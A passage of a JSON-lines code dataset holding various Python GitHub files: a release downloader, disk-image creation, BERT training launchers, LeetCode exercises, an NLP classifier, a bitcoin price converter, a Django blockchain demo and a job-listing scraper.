color='lightblue', align='center')\nplt.xticks(range(X_train.shape[1]), feat_labels[indices], rotation=90)\nplt.tight_layout()\nplt.show()\n","repo_name":"FitzHoo/MachineLearning","sub_path":"SequentialBackwardSelection.py","file_name":"SequentialBackwardSelection.py","file_ext":"py","file_size_in_byte":6531,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} {"seq_id":"32404927104","text":"import urllib.request\nfrom pathlib import Path\n\nimport typer\nfrom github import Github\n\n_github = Github()\n\n\nclass Releases:\n    def __init__(self, repo: str):\n        self.repo_name = repo\n        self.repo = _github.get_repo(repo)\n        self.releases = self.repo.get_releases()\n        if self.releases.totalCount == 0:\n            raise ValueError(\"No releases found\")\n\n    def get_repo_name(self):\n        return self.repo_name\n\n    def get_project_name(self):\n        return self.repo.name\n\n    def get_project_description(self):\n        return self.repo.description\n\n    def get_latest_version(self):\n        r = self.releases[0]\n        ver = r.tag_name.replace(\"-\", \"_\")\n        if ver.startswith(\"v\"):\n            ver = ver[1:]\n        return ver\n\n    def get_publish_date(self):\n        r = self.releases[0]\n        return r.published_at.strftime(\"%Y-%m-%d\")\n    \n    def download_tarball(self, save_dir):\n        assets = self.releases[0].assets\n        asset_scoretable = []\n        arch = [\"linux\", \"amd64\", \"x86_64\", \"x86-64\", \"x64\"]\n        lib = [\"glibc\", \"gnu\"]\n        extensions = [\"tar\", \"tgz\", \"gz\", \"zip\"]\n        for asset in assets:\n            score = 0\n            s = asset.name.lower()\n            for kw in arch:\n                if kw in s:\n                    score += 100\n            if any(f\".{ext}\" in s for ext in extensions):\n                score += 10\n            for kw in lib:\n                if kw in s:\n                    score += 1\n            asset_scoretable.append((asset, score))\n        asset_scoretable.sort(key=lambda x: x[1], reverse=True)\n\n        if len(asset_scoretable) == 0:\n            raise ValueError(\"No tarballs found\")\n\n        print(f\"Found {len(asset_scoretable)} tarballs:\\n\")\n        for i, (asset, score) in enumerate(asset_scoretable):\n            print(f\"{i}. 
{asset.name}\")\n asset = asset_scoretable[typer.prompt(\"\\nSelect tarball to download\", type=int, default=0)][0]\n\n with typer.progressbar(label=\"Downloading\", length=asset.size) as progress:\n def report(blocknum, blocksize, totalsize):\n progress.update(blocknum * blocksize - progress.pos)\n urllib.request.urlretrieve(asset.browser_download_url, Path(save_dir)/asset.name, reporthook=report)\n \n return asset.name\n","repo_name":"jinliu/arch-github-package","sub_path":"arch_github_package/gh.py","file_name":"gh.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"21313710161","text":"import os\nfrom datetime import *\nimport random\nfrom classes.Disk_Classes import *\nfrom utils.Utils import *\nfrom classes.State import estado\ndef mkdisk_command(size_option, path_option, fit_option, unit_option):\n print(\"---------------------------------------\")\n print(\"Comando MKDISK en ejecucion con los siguientes parametros:\")\n print(f\"Size: {size_option}\")\n print(f\"Unit: {unit_option}\")\n print(f\"Fit: {fit_option}\")\n print(f\"Path: {path_option}\")\n if(int(size_option)>0):\n ruta_expandida = getPath(path_option)\n verifypath(str(ruta_expandida))\n \n with open(str(ruta_expandida), \"wb\") as file:\n num_zeros = getnum_zeros(size_option, unit_option) \n \n file.write(b'\\x00' * num_zeros)\n fit_mbr = getfit_mbr(str(fit_option))\n #obtener fecha\n fecha_actual = datetime.now()\n fecha_int = int(fecha_actual.strftime(\"%d%m%Y%H%M\"))\n \n # CREACION DE LAS CAUTRO PARTICIONES\n partition1 = Partition(\"0\", \"0\", \"0\", 0, 0, \"0000000000000000\")\n partition2 = Partition(\"0\", \"0\", \"0\", 0, 0, \"0000000000000000\")\n partition3 = Partition(\"0\", \"0\", \"0\", 0, 0, \"0000000000000000\")\n partition4 = Partition(\"0\", \"0\", \"0\", 0, 0, \"0000000000000000\")\n mbr_data = MBR(num_zeros, fecha_int, random.randint(0,100), fit_mbr, partition1, partition2, partition3, partition4)\n #empaquetar MBR y partitions\n mbr_datapack = mbr_data.pack()\n file.seek(0) \n file.write(mbr_datapack)\n print(\"Disco creado con exito\")\n estado.mensaje = \"¡Disco creado con exito!\"\n print(\"---------------------------------------\")\n elif(int(size_option)<=0):\n print(\"ERROR: El parametro size tiene que ser mayor a 0\")\n estado.mensaje = \"ERROR: El parametro size tiene que ser mayor a 0\"\n print(\"---------------------------------------\")\ndef getnum_zeros(size, unit):\n if(str(unit)==\"M\"):\n return (int(size)*1024*1024)\n elif(str(unit)==\"K\"):\n return (int(size)*1024)\n elif(str(unit)==\"B\"):\n return int(size)\n else:\n print(\"La unidad de medida es incorrecta\")\n estado.mensaje = \"ERROR: La unidad de medida es incorrecta\"\n\n\ndef getfit_mbr(fitop):\n if(fitop==\"FF\"):\n return \"F\"\n elif(fitop==\"BF\"):\n return \"B\"\n elif(fitop==\"WF\"):\n return \"W\"\n else:\n print(\"ERROR: Fit incorrecto\")\n estado.mensaje = \"ERROR: La unidad de medida es incorrecta\"\n","repo_name":"LestherLopez/-MIA-P2_202110897","sub_path":"Server/commands/mkdisk_command.py","file_name":"mkdisk_command.py","file_ext":"py","file_size_in_byte":2595,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6247778743","text":"import logging\nimport os\n\nlogging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s',\n datefmt='%m/%d/%Y %H:%M:%S',\n level=logging.INFO)\nlogger = logging.getLogger(__name__)\n# 
model\nbert_base_model = \"~/bert-base-uncased.tar.gz\"\nbert_base_vocab = \"~/bert-base-uncased-vocab.txt\"\n# bert_large_model = \"../BERT/bert-large-uncased.tar.gz\"\n# bert_large_vocab = \"../BERT/bert-large-uncased-vocab.txt\"\n\ntrain_file = 'data/ms_marco_dp0.7/train-yesno-cb-dp70.json'\ndev_file = 'data/ms_marco_dp0.7/dev-yesno-cb-dp70.json'\n\ntask_name = 'marco-cb-dp0.7'\n\nreader_name = 'cb-marco'\n\nbert_name = 'mlp'\n\noutput_dir = f\"experiments/marco-cb-dp0.7/mlp/v1.0/\"\n\ncmd = f\"python main_0.6.2.py \\\n --bert_model bert-base-uncased \\\n --vocab_file {bert_base_vocab} \\\n --model_file {bert_base_model} \\\n --output_dir {output_dir} \\\n --predict_dir {output_dir} \\\n --train_file {train_file} \\\n --predict_file {dev_file} \\\n --max_seq_length 480 --max_query_length 50 \\\n --do_train --do_predict --train_batch_size 8 --predict_batch_size 8 --max_answer_length 15 \\\n --learning_rate 2e-5 \\\n --num_train_epochs 3.0 \\\n --max_ctx 3 \\\n --bert_name {bert_name} \\\n --task_name {task_name} \\\n --reader_name {reader_name} \"\n\nprint(cmd)\nos.system(cmd)\n\nbert_name = 'hie'\n\noutput_dir = f\"experiments/marco-cb-dp0.7/hie/v1.4/\"\n# Best performance\n\ncmd = f\"python main_0.6.2.py \\\n --bert_model bert-base-uncased \\\n --vocab_file {bert_base_vocab} \\\n --model_file {bert_base_model} \\\n --output_dir {output_dir} \\\n --predict_dir {output_dir} \\\n --train_file {train_file} \\\n --predict_file {dev_file} \\\n --max_seq_length 480 --max_query_length 50 \\\n --do_train --do_predict --train_batch_size 8 --predict_batch_size 8 --max_answer_length 15 \\\n --learning_rate 2e-5 \\\n --num_train_epochs 2.0 \\\n --max_ctx 3 \\\n --bert_name {bert_name} \\\n --task_name {task_name} \\\n --reader_name {reader_name} \" \\\n f\"--evidence_lambda 0.0\"\n\nprint(cmd)\nos.system(cmd)\n","repo_name":"SparkJiao/Self-Training-MRC","sub_path":"scripts/marco-cb-dp0.7-co-training/scratch1.0.py","file_name":"scratch1.0.py","file_ext":"py","file_size_in_byte":2296,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"37"} +{"seq_id":"10016455298","text":"from typing import Any, Dict, List, Union\n\nfrom typing_extensions import TypedDict\n\nfrom .types import (\n CompletionItem,\n CompletionList,\n Hover,\n MessageActionItem,\n ServerCapabilities,\n SymbolInformation,\n WorkspaceFolder,\n)\n\n\nclass _InitializeResult__Optional(TypedDict, total=False):\n serverInfo: Dict[str, Any] # lazy\n\n\nclass InitializeResult(_InitializeResult__Optional):\n capabilities: ServerCapabilities\n\n\nShutdownResult = Union[None]\n\n\nShowMessageResult = Union[MessageActionItem, None]\n\n\nclass WorkDoneProgressCreateResult(TypedDict):\n pass # this might be null\n\n\nWorkSpaceFoldersResult = Union[List[WorkspaceFolder], None]\n\n\nWorkspaceSymbolResult = Union[List[SymbolInformation], None]\n\n\nExecuteCommandResult = Union[Any, None]\n\n\nclass _ApplyWorkspaceEditResult__Optional(TypedDict, total=False):\n failureReason: str\n\n\nclass ApplyWorkspaceEditResult(_ApplyWorkspaceEditResult__Optional):\n applied: bool\n\n\nCompletionResult = Union[List[CompletionItem], CompletionList, None]\nCompletionItemResolveResult = CompletionItem\n\nHoverResult = Union[Hover, None]\n\nRegisterCapabilityResult = Union[None]\nUnRegisterCapabilityResult = Union[None]\nConfigurationResult = 
List[Any]\n","repo_name":"antdking/languageserver-python","sub_path":"languageserver/protocol/results.py","file_name":"results.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5963265515","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Dec 1 11:33:33 2016\n\n@author: dong.qu\n\"\"\"\ndef removeDuplicates(nums):\n if not nums:\n return 0\n \n newTail = 0\n \n for i in range(1, len(nums)):\n if nums[i] != nums[newTail]:\n newTail += 1\n nums[newTail] = nums[i]\n \n return newTail + 1\n \n \nnums = [1,2,2,2,3,4,4,5]\nprint(removeDuplicates(nums))\nprint(nums)\n\ndef removeElement(nums, val):\n \"\"\"\n :type nums: List[int]\n :type val: int\n :rtype: int\n \"\"\"\n tail = 0\n for i in range(0,len(nums)):\n if nums[i] != val:\n nums[i], nums[tail] = nums[tail], nums[i]\n tail+=1\n \n return tail\n \nnums = [1,1,6,5,1,4,1,2]\nprint(removeElement(nums, 1))\nprint(nums)\n\ndef rotate(nums, k):\n kt = k % len(nums)\n km = len(nums)-kt\n print('km ', km)\n nums[:] = nums[km:]+nums[:km]\n \nnums = [1,2,3,4,5,6,7]\nrotate(nums, 3)\nprint(nums)\n\ndef mytest(nums):\n nums[:] =[]\n \ndef merge(nums1, m, nums2, n):\n \"\"\"\n :type nums1: List[int]\n :type m: int\n :type nums2: List[int]\n :type n: int\n :rtype: void Do not return anything, modify nums1 in-place instead.\n \"\"\"\n if not (nums1 and nums2):\n nums1[:] = nums1+nums2\n else:\n rl = []\n k,j =0,0\n for i in range(m+n):\n if nums1[k] < nums2[j]:\n rl.append(nums1[k])\n k+=1\n if k==m:\n rl+=nums2[j:]\n break\n else:\n rl.append(nums2[j])\n j+=1\n if j==n:\n rl+=nums1[k:]\n break\n nums1[:] = rl\n \nnums1 = [1,4,6,7,8]\nm = len(nums1)\nnums2 = [2,3,6,8,10, 15]\nn = len(nums2)\n\nnums1 = [1,]\nm = len(nums1)\nnums2 = [2]\nn = len(nums2)\n\nmerge(nums1,m,nums2,n)\nprint(nums1)","repo_name":"qd452/Algorithm4","sub_path":"Leetcode/src/remove_duplicates_from_sorted_array.py","file_name":"remove_duplicates_from_sorted_array.py","file_ext":"py","file_size_in_byte":1861,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"73568672746","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jul 15 00:07:58 2020\r\n\r\n@author: dibya\r\n\"\"\"\r\nimport pandas as pd\r\nimport numpy as np\r\nimport seaborn as sns\r\nimport nltk\r\nnltk.download('stopwords')\r\nnltk.download('wordnet')\r\nimport re\r\nfrom nltk.corpus import stopwords\r\nfrom nltk.stem import WordNetLemmatizer\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.naive_bayes import MultinomialNB\r\nfrom sklearn.metrics import confusion_matrix\r\nfrom sklearn.metrics import accuracy_score\r\nfrom sklearn.metrics import classification_report\r\n\r\ndf = pd.read_csv(\"D:\\\\Data Science\\\\Projects\\\\Kaggle- Nlp detection\\\\train.csv\")\r\ndf.head()\r\ndf.shape\r\ndf.info()\r\ndf.isnull().sum()\r\n\r\n##### EDA ###\r\nsns.countplot('target',data=df)\r\ndf['keyword'].value_counts()\r\n\r\ndata=df.drop(['location','keyword'],axis=1)\r\ndata.head()\r\n\r\n# Cleaning the reviews\r\n\r\ncorpus = []\r\nfor i in range(0,7613):\r\n\r\n # Cleaning special character from the tweets\r\n review = re.sub(pattern='[^a-zA-Z]',repl=' ', string=data['text'][i])#remove everything apart from capital A to Z and small a to z\r\n \r\n\r\n # Converting the entire tweets into lower case\r\n tweets = review.lower()\r\n\r\n # Tokenizing the tweetsby words\r\n 
tweets_words = tweets.split()\r\n    \r\n    # Removing the stop words\r\n    tweets_words = [word for word in tweets_words if not word in set(stopwords.words('english'))]\r\n    \r\n    # lemmatizing the words\r\n    lemmatizer = WordNetLemmatizer()\r\n    tweets= [lemmatizer.lemmatize(word) for word in tweets_words]\r\n\r\n    # Joining the lemmatized words\r\n    tweets = ' '.join(tweets)\r\n    \r\n    # Creating a corpus\r\n    corpus.append(tweets)\r\n    \r\ncorpus[:5]\r\n\r\n## Convert Text To Machine Readable Form\r\ncv = CountVectorizer()\r\nX = cv.fit_transform(corpus).toarray()\r\ny = data['target']\r\nprint(X.shape)\r\n\r\n#splitting the dataset\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)\r\n\r\n# Fitting Naive Bayes to the Training set\r\nfrom sklearn.naive_bayes import MultinomialNB\r\nclassifier = MultinomialNB()\r\nclassifier.fit(X_train, y_train)\r\n\r\n\r\n# Predicting the Test set results\r\ny_pred = classifier.predict(X_test)\r\nprint(y_pred)\r\n\r\n#accuracy\r\naccuracy=confusion_matrix(y_test,y_pred )\r\nprint(\"confusion_matrix:\",accuracy)\r\n\r\naccuracy=accuracy_score(y_test,y_pred )\r\nprint(\"accuracy_score:\",accuracy)\r\n\r\nprint(classification_report(y_test,y_pred ))\r\n\r\n### test data\r\ntest = pd.read_csv(\"D:\\\\Data Science\\\\Projects\\\\Kaggle- Nlp detection\\\\test.csv\")\r\nsubmit = pd.read_csv(\"D:\\\\Data Science\\\\Projects\\\\Kaggle- Nlp detection\\\\sample_submission.csv\")\r\n\r\ntest.drop(['keyword','location'],axis=1,inplace=True)\r\n\r\n\r\ncorpus1 =[]\r\nfor i in range(0,3263):\r\n\r\n\r\n    # Cleaning special character from the tweets\r\n    review = re.sub(pattern='[^a-zA-Z]',repl=' ', string=test['text'][i])\r\n    \r\n    # Converting the entire tweets into lower case\r\n    tweets = review.lower()\r\n\r\n    # Tokenizing the tweets by words\r\n    tweets_words = tweets.split()\r\n    \r\n    # Removing the stop words\r\n    tweets_words = [word for word in tweets_words if not word in set(stopwords.words('english'))]\r\n    \r\n    # lemmatizing the words\r\n    lemmatizer = WordNetLemmatizer()\r\n    tweets = [lemmatizer.lemmatize(word) for word in tweets_words]\r\n\r\n    # Joining the lemmatized words\r\n    tweets = ' '.join(tweets)\r\n\r\n    y_pred=cv.transform([tweets]).toarray()  # vectorize the preprocessed tweet so it matches the training pipeline\r\n    pre=classifier.predict(y_pred)\r\n    corpus1.append(pre)\r\n\r\nprint(len(corpus1))\r\n\r\nsubmit['id'] = test['id']\r\nsubmit['target'] = corpus1\r\n# Let's convert our submission dataframe 'target' column to ints\r\nsubmit['target'] = submit['target'].astype(int)\r\n\r\n# for Kaggle submission\r\nsubmit.to_csv('../submission_nlp1.csv', index=False)\r\nprint('Submission CSV is ready!')\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"dibyanjan-patra/Kaggle--NLP-with-Disaster-Tweets.-","sub_path":"naiveBayes_model.py","file_name":"naiveBayes_model.py","file_ext":"py","file_size_in_byte":3753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
text = [\"The quick brown fox jumped over the lazy dog.\",\r\n# \"The dog.\",\r\n# \"The fox\"]\r\n# vectorizer = TfidfVectorizer()\r\n# vectorizer.fit(text)\r\n# print(vectorizer.vocabulary_)\r\n# print(vectorizer.idf_)\r\n# vector = vectorizer.transform([text[0]])\r\n# print(vector.shape)\r\n# print(vector.toarray())\r\n\r\nfrom sklearn.feature_extraction.text import HashingVectorizer\r\ntext = [\"The quick brown fox jumped over the lazy dog.\"]\r\nvectorizer = HashingVectorizer(n_features=20)\r\nvector = vectorizer.transform(text)\r\nprint(vector.shape)\r\nprint(vector.toarray())","repo_name":"rg4592/text-representation","sub_path":"text_representation.py","file_name":"text_representation.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26614653693","text":"from collections import defaultdict\nS = input()\nn = len(S)\nresult = 0\n\ncnt = defaultdict(int)\n\n# 前の文字と、前の前の文字\nprev_c, prev2_c = \"\", \"\"\n\nfor i in range(len(S)-1, -1, -1):\n now_c = S[i]\n\n # 前と違う文字が二回連続で現れたら\n if now_c == prev_c != prev2_c:\n # そこから右がその文字に書き換えられるので、\n # 該当文字を除く文字数を答えに加算。\n result += (n - i - 1) - cnt[now_c]\n # カウントは全て書き変わった文字になる\n cnt = defaultdict(int, {now_c: len(S) - i - 1})\n cnt[now_c] += 1\n prev2_c, prev_c = prev_c, now_c\n\nprint(result)\n","repo_name":"mei28/Competitive-programing","sub_path":"ARC-113/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28345892020","text":"#!/usr/bin/python3\r\nimport requests\r\nimport re\r\nfrom collections import Counter\r\n\r\nAPI_URL = 'https://api.hh.ru/vacancies/'\r\nVACANCY = 'python developer'\r\nAREA_NUMBER = 1\r\nPER_PAGE = '100'\r\nPAGES = 21\r\n\r\ndef get_ids(url, vacancy, area_number):\r\n ids = []\r\n try:\r\n for page in range(PAGES):\r\n param = {'text': vacancy, 'area': area_number,\r\n 'per_page': PER_PAGE, 'page': str(page)}\r\n r = requests.get(url, param).json()\r\n for i in r['items']:\r\n ids.append(i['id'])\r\n except KeyError:\r\n pass\r\n finally:\r\n return ids\r\n\r\ndef get_descriptions_from_url(url, ids):\r\n descriptions = []\r\n for id in ids:\r\n id_url = url + id\r\n print(id_url)\r\n r = requests.get(id_url).json()\r\n descriptions.append(r['description'])\r\n return descriptions\r\n\r\ndef get_text_from_html(html):\r\n text = []\r\n for i in html:\r\n text.append(re.sub('<.*?>', '', i))\r\n return text\r\n\r\ndef normalize_text(text):\r\n norm_text = []\r\n skips_1 = [\".\", \",\", \":\", \";\", \"'\", '\"', \"(\", \")\", \"!\", \"«\", \"»\", \r\n \"?\", \"•\", \"·\"]\r\n skips_2 = [\"/\", \"\\\\\", \"\\\\\\\\\", \" \", \" \", \"-\", \"–\"]\r\n for i in text:\r\n i = i.lower()\r\n for char in skips_1:\r\n i = i.replace(char, \"\")\r\n for char in skips_2:\r\n i = i.replace(char, \" \")\r\n norm_text.append(i)\r\n return norm_text\r\n\r\ndef count_words(text):\r\n word_counts = Counter(text.split(\" \")).most_common(500)\r\n return word_counts\r\n\r\ndef get_string_from_lists(list):\r\n descriptions_str = ' '.join(list)\r\n return descriptions_str\r\n\r\ndef main():\r\n ids = get_ids(API_URL, VACANCY, AREA_NUMBER)\r\n print(len(ids))\r\n descriptions = get_descriptions_from_url(API_URL, ids)\r\n descriptions = get_text_from_html(descriptions)\r\n descriptions = normalize_text(descriptions)\r\n print(descriptions)\r\n descriptions_str = get_string_from_lists(descriptions)\r\n word_counts = 
count_words(descriptions_str)\r\n    normal_words = []\r\n    for i in word_counts:\r\n        if len(i[0]) >= 3:\r\n            normal_words.append(i)\r\n    print(normal_words)\r\n    return 0\r\n\r\nif __name__ == '__main__':\r\n    exit(main())\r\n","repo_name":"greyels/hh-parser","sub_path":"hh_job_parser.py","file_name":"hh_job_parser.py","file_ext":"py","file_size_in_byte":2241,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} {"seq_id":"73284684266","text":"import json\nimport hashlib\nimport base64\nfrom ecdsa import BadSignatureError, SECP256k1, SigningKey, VerifyingKey\n\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom .models import *\nfrom .forms import *\nimport json\nfrom .blockchain import Blockchain\n\n\n@login_required(login_url=\"login\")\ndef transaction(request):\n    profile = request.user.profile\n    name = request.user.first_name\n    email = request.user.email\n    form_transaction = TransactionForm(instance=profile)\n    \n    \n    \n    \n    if request.method == \"POST\" and 'button1' in request.POST:\n        form = TransactionForm(request.POST)\n        if form.is_valid():\n            rekodharga = form.save(commit=False)\n            rekodharga.owner = profile\n            rekodharga.save()\n            newblock = create_block(rekodharga, profile)\n            rekodharga.data_hash = newblock\n            rekodharga.save()\n            return redirect('transaction')\n\n    record_list = profile.rekodharga_set.all()\n    context = {\n        'record_list' : record_list,\n        'form_transaction' : form_transaction,\n        'name': name,\n        'email': email,\n    }\n    return render(request, 'dashboard/transaction.html', context)\n\n\ndef create_block(rekodharga, profile):\n    previous_block = RekodBlokchain.objects.latest('timestamp')\n    # Get from the user profile the public and private key\n    vk_string = profile.public_key # verifying key\n    sk_string = profile.private_key # signing key\n    \n    \n    # Store all transaction information into dict\n    temp_dict = {\n        'company_name_buy': rekodharga.company_name_buy,\n        'item_type': rekodharga.item_type,\n        'quantity': rekodharga.quantity,\n        'purchase_price': rekodharga.purchase_price,\n    }\n\n    # Get previous hash from previous block\n    prev_hash = previous_block.hash_id\n\n    encoded_data = json.dumps(temp_dict).encode()\n    # Convert encoded data to data hash value and store in block\n    data_hash = hashlib.sha256(encoded_data).hexdigest()\n\n    # Signing the block using SECP256k1 elliptic curve\n    sk = SigningKey.from_string(sk_string, curve=SECP256k1)\n    vk = VerifyingKey.from_string(vk_string, curve=SECP256k1)\n\n    # Get the digital signature and store value in block\n    digital_signature = sk.sign(encoded_data)\n\n    # Get previous proof from previous block\n    previous_proof = previous_block.nonce\n\n    # Get the proof of work for this block\n    nonce, hash_id = _proof_of_work(previous_proof, data_hash)\n\n    newblock = RekodBlokchain.objects.create(\n        prev_hash = prev_hash,\n        data_hash = data_hash,\n        data_signature = digital_signature,\n        public_key = vk_string,\n        nonce = nonce,\n        hash_id = hash_id,\n        flag_status= False\n    )\n    \n    return newblock\n    \n\ndef _to_digest(\n        new_proof: int, previous_proof: int, data: str\n    ) -> bytes:\n    to_digest = str(new_proof ** 2 - previous_proof ** 2 + 2) + data\n    # It returns an utf-8 encoded version of the string\n    return to_digest.encode()\n\n\ndef _proof_of_work(previous_proof: str, data: str) -> int:\n    new_proof = 1\n    check_proof = False\n    hash_id = ''\n    while not check_proof:\n        
to_digest = _to_digest(new_proof, previous_proof, data)\n        hash_operation = hashlib.sha256(to_digest).hexdigest()\n        if hash_operation[:4] == \"0000\":\n            check_proof = True\n            hash_id = hash_operation\n        else:\n            new_proof += 1\n\n    return new_proof, hash_id\n\n\n@login_required(login_url=\"login\")\ndef blockchain(request):\n    # RekodBlokchain.objects.all().delete()\n    # Blockchain universal rekod asing\n    profile = request.user.profile\n    name = request.user.first_name\n    email = request.user.email\n    recordblockchain_list = RekodBlokchain.objects.all()\n    print(recordblockchain_list)\n    context = {\n        'recordblockchain_list' : recordblockchain_list,\n        'name': name,\n        'email': email,\n    }\n    return render(request, 'dashboard/blockchain.html', context)\n    \n@login_required(login_url=\"login\")\ndef block_detail(request, pk=None):\n    \n    profile = request.user.profile\n    name = request.user.first_name\n    email = request.user.email\n    try:\n        detail_block = RekodBlokchain.objects.get(id=pk)\n    except ObjectDoesNotExist:\n        print(\"Error!\")\n    \n    if detail_block.data_signature == None:\n        digital_signature_base64 = None\n    else:\n        digital_signature_base64 = base64.b64encode(detail_block.data_signature).decode()\n    \n    if detail_block.public_key == None:\n        public_key = None\n    else:\n        public_key = base64.b64encode(detail_block.public_key).decode()\n\n    context = {\n        'detail_block' : detail_block,\n        'digital_signature_base64': digital_signature_base64,\n        'public_key': public_key,\n        'name': name,\n        'email': email,\n    }\n    return render(request, 'dashboard/blockchain_detail.html', context)\n\n@login_required(login_url=\"login\")\ndef validate_block(request):\n    profile = request.user.profile\n    name = request.user.first_name\n    email = request.user.email\n    # vk_string = profile.public_key\n    # Queryset for rekod harga\n    listRecord = RekodHarga.objects.all()\n    # Queryset for recordblokchain\n    recordblockchain_queryset = RekodBlokchain.objects.all()\n    print(recordblockchain_queryset)\n    print(\"\\n\")\n    # Change recordblokchain queryset to list\n    recordblockchain_list = list(recordblockchain_queryset)\n    # Remove genesis block from the list\n    recordblockchain_list.pop(0)\n\n    index = 0\n    for x in recordblockchain_list:\n        status = True\n        id = x.id\n        for y in listRecord:\n            temp_dict = {\n                'company_name_buy': y.company_name_buy,\n                'item_type': y.item_type,\n                'quantity': y.quantity,\n                'purchase_price': y.purchase_price,\n            }\n            encoded_data = json.dumps(temp_dict).encode()\n            data_hash = hashlib.sha256(encoded_data).hexdigest()\n            print(\"Comparing \" + str(data_hash) + \" with \" + x.data_hash)\n            if data_hash == x.data_hash:\n                vk = VerifyingKey.from_string(x.public_key, curve=SECP256k1)\n                try:\n                    if vk.verify(x.data_signature, encoded_data):\n                        status = False\n                        break\n                except BadSignatureError:\n                    print(data_hash)\n                    print(\"Bad Signature!\\n\")\n                # if sign_status:\n                #     status = False\n                #     break\n        if status:\n            change_flag_status(id, status)\n            print(\"Block #\" + str(index + 2) + \" data has changed\")\n        else:\n            change_flag_status(id, status)\n            print(\"Block #\" + str(index + 2) + \" still maintain the same\")\n        index += 1\n    \n    recordblockchain_list = RekodBlokchain.objects.all()\n    context = {\n        'recordblockchain_list' : recordblockchain_list,\n        'name': name,\n        'email': email,\n    }\n    return render(request, 'dashboard/blockchain.html', context)\n\ndef change_flag_status(id, status):\n    blok = RekodBlokchain.objects.get(id=id)\n    blok.flag_status = status\n    
blok.save()","repo_name":"froxity/SSB","sub_path":"dashboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25067034978","text":"import requests\r\nimport sys\r\nimport json # for presenting the API in JSON format\r\n\r\n\r\ntry: # checks that input is a number or decimal\r\n if len(sys.argv) == 2 and sys.argv[1].isalpha() == False:\r\n # request API and output of it\r\n bitcoin = requests.get(\"https://api.coindesk.com/v1/bpi/currentprice.json\")\r\n # converts to 2nd argument or the number to a float\r\n t = float(sys.argv[1])\r\n\r\n # finds the rate of a float and converts it to an integer\r\n b = bitcoin.json()\r\n b = float(b[\"bpi\"][\"USD\"][\"rate_float\"])\r\n\r\n # exception if the request is not successful or if the index for commandline argument is out of range\r\nexcept (requests.RequestException, IndexError):\r\n print(\"Missing command-line argument\")\r\n sys.exit()\r\n\r\n # if the command line argument is not a number or decimal\r\nexcept ValueError:\r\n print(\"command-line argument is not a number\")\r\n sys.exit()\r\n # formatting for the number to have commas for each thousandth and up and also to display up to the 4th decimal place\r\nelse:\r\n print(f\"${t * b:,.4f}\")\r\n","repo_name":"Adamb0lt/CS50","sub_path":"CS50p/week4_libraries/bitcoin/bitcoin.py","file_name":"bitcoin.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6134933248","text":"import pickle\n\nif __name__=='__main__':\n\n park_info = {}\n park_info['east_mount_falcon'] = {'pretty_name':'East Mount Falcon', 'lat':39.646865, 'lon':-105.196314, 'capacity': 49}\n park_info['east_three_sisters'] = {'pretty_name':'East Three Sisters', 'lat':39.623484, 'lon':-105.345841, 'capacity':26}\n park_info['east_white_ranch'] = {'pretty_name':'East White Ranch', 'lat':39.798109, 'lon':-105.246799, 'capacity':51}\n park_info['lair_o_the_bear'] = {'pretty_name':\"Lair O' The Bear\", 'lat':39.665616, 'lon':-105.258430, 'capacity':97}\n park_info['mount_galbraith'] = {'pretty_name':'Mount Galbraith', 'lat':39.774085, 'lon':-105.253516, 'capacity':27}\n park_info['west_mount_falcon'] = {'pretty_name':'West Mount Falcon', 'lat':39.637136, 'lon':-105.239178, 'capacity':62}\n park_info['west_three_sisters'] = {'pretty_name':'West Three Sisters', 'lat':39.624941, 'lon':-105.360398, 'capacity':49}\n\n with open('./data/park_info.pkl', 'wb') as f:\n pickle.dump(park_info, f)","repo_name":"andypicke/JeffCo-OpenSpace-LotSpot-Analysis","sub_path":"src/make_park_info.py","file_name":"make_park_info.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29299949039","text":"# Write a Python program to get the maximum and minimum value in a dictionary. 
